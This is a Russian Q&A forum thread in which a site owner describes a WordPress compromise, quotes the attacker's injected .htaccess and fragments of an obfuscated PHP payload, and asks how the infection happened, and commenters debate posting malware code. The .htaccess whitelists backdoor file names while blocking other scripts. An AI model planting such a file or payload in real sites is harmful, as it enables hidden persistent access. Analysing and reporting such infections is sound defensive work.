# Мой сайт заражён

Tags: wordpress

Сегодня утром столкнулись с проблемой - сломалась админка в WP.

Начал копаться, и выяснил, что сайт был заражён, побиты практически все PHP-скрипты в движке в админке, фронт не тронут.

Первое, что было обнаружено - модифицированный .htaccess в индексной директории. и в каждой вложенной аналогичный. Его содержимое:

```
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|load.php|xmlrpcs.php|container.php|entity.php|header.php|style.php|constant.php|access.php|locale.php|uninstall.php|themes.php|wp-login.php|scindex.php|admin.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
```

В каждом модифицированном PHP-файле лежал обфусцированный код:

```
<?php
$x = "'7Rr9c9O48mf6V7ieDk4eqZMA5bi2oS2QAveg7UvSu2OA53FtJdHDs...
```

Его читабельная версия:

```
error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = 'mapss.xml';
$dt = 0;
$sitemap_file = 'sitemap';
$mapnum = 2000;
...
```

Беглый гуглинг выдал, что данное "произведение искусства" уже пару раз кому-то встречалось, но никакой конкретики.

Также видно, что он подгружает ещё несколько завёрнутых в base64 кусков полезной нагрузки.

Посмотрев официальные источники WP, никакой информации о свежих уязвимостях не нашёл. Так же добавляет проблем то, что логи на сервере не писались, стояла просто голая CMS, над которой только сегодня должны были начать работу, что очень сильно спасло.

Собственно, вопрос к вам, товарищи, у кого имеются сайты на WP - не сталкивались ли вы с подобным?  Отсутствие логов создаёт проблему в том, что не известна изначальная точка заражения, а то, что злоумышленник снова пойдёт атаковать сайт - не факт, и выяснить это будет проблематично.

Даты изменения скриптов говорят только об одном - всё заражение прошло буквально в пару секунд, разброс во времени модификации файлов 1-3 секунды, многие дают абсолютно одинаковое время изменения.

Сам сайт размещён на обычном хостинге, что даёт право исключить заражение со стороны взлома самого сервера, но ситуация максимально не приятная, и хочется исключить повторение этой ситуации на ближайшее будущее.

В общем, заранее спасибо за Ваши версии и полезную информацию, куда копать.

Comment: Комментарии не предназначены для расширенной дискуссии; разговор [перемещён в чат](https://chat.stackexchange.com/rooms/133157/discussion-on-question-by--rs---).

Comment: Не надо сюда исходный код вирусни выкладывать.

Comment: @KAGGDesign, вообще-то этот вопрос видел модератор, и счёл его допустимым. Значит, можно. И в других вопросах я видел, что приводят вредоносный код с обязательным предупреждением о вредоносности.

Comment: По метке WordPress меня тоже можно считать модератором. Вирусный код буду удалять и впредь. Пользы от него ноль, а вред может быть, если очередной мамкин хакер его скопирует и начнёт распространять.

Comment: @KAGGDesign, польза есть: открытая публикация такого рода сообщений стимулирует разработчиков закрывать обнаруженные уязвимости.

Comment: 1. WP не содержит известных уязвимостей, проблема у вас. Наймите опытного аналитика, он вам пояснит, что сделано не так. 2. Найденные уязвимости никогда не публикуют открыто, на wp.org для этого есть специальный раздел, где можно отправить приватное сообщение. 3. У вас даже не уязвимость - у вас код вируса, который вы тут хотите распространять. Найдите для этого другое место.

Comment: "товарищи, у кого имеются сайты на WP - не сталкивались ли вы с подобным". Сопровождаю несколько весьма посещаемых сайтов на WP, сканеры уязвимостей к нам как на работу ходят. Ни с чем подобным не сталкивались